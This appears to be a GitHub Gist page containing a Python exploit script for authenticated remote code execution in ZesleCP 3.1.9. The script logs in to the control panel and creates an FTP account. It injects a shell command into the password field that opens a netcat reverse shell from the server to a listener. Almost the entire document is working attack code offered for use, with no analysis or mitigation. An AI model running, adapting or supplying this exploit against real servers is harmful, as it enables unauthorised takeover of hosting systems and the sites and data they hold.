Created
August 27, 2021 13:21
-
-
Save numanturle/618aeaf815f62c76c87fa622b6573886 to your computer and use it in GitHub Desktop.
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 ) | |
| # author: twitter.com/numanturle | |
| # usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD | |
| # https://www.youtube.com/watch?v=5lTDTEBVq-0 | |
| import argparse,requests,warnings,json,random,string | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| from cmd import Cmd | |
| warnings.simplefilter('ignore',InsecureRequestWarning) | |
| def init(): | |
| parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )') | |
| parser.add_argument('-u','--host',help='Host', type=str, required=True) | |
| parser.add_argument('-l', '--login',help='Username', type=str, required=True) | |
| parser.add_argument('-p', '--password',help='Password', type=str, required=True) | |
| args = parser.parse_args() | |
| exploit(args) | |
| def exploit(args): | |
| listen_ip = "0.0.0.0" | |
| listen_port = 1337 | |
| session = requests.Session() | |
| target = "https://{}:2087".format(args.host) | |
| username = args.login | |
| password = args.password | |
| print("[+] Target {}".format(target)) | |
| login = session.post(target+"/login", verify=False, json={"username":username,"password":password}) | |
| login_json = json.loads(login.content) | |
| if login_json["success"]: | |
| session_hand_login = session.cookies.get_dict() | |
| print("[+] Login successfully") | |
| print("[+] Creating ftp account") | |
| ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10)) | |
| print("[+] Username : {}".format(ftp_username)) | |
| print("[+] Send payload....") | |
| payload = { | |
| "ftp_user": ftp_username, | |
| "ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port) | |
| } | |
| try: | |
| feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3) | |
| except requests.exceptions.ReadTimeout: | |
| pass | |
| print("[+] Successful") | |
| else: | |
| print("[-] AUTH : Login failed msg: {}".format(login_json["message"])) | |
| if __name__ == "__main__": | |
| init() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment